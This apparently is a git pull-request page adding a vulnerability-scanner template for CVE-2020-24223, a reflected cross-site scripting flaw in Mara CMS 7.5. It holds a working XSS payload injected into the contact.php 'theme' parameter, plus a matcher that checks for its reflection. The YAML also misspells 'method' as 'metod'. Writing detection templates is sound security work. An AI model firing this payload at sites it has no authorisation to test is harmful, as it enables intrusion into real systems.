Merge pull request #390 from pikpikcu/patch-4
Add CVE-2020-24223 Mara CMS 7.5 - Reflective Cross-Site Scriptingpatch-1
commit
cc18ebdab5
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-24223
|
||||
|
||||
info:
|
||||
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
|
||||
# Vendor Homepage: https://sourceforge.net/projects/maracms/
|
||||
# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
|
||||
# Source: https://www.exploit-db.com/exploits/48777
|
||||
|
||||
requests:
|
||||
- metod: GET
|
||||
path:
|
||||
- '{{BaseURL}}/contact.php?theme=tes"><script>alert(document.domain)</script>'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
part: body
|
Loading…
Reference in New Issue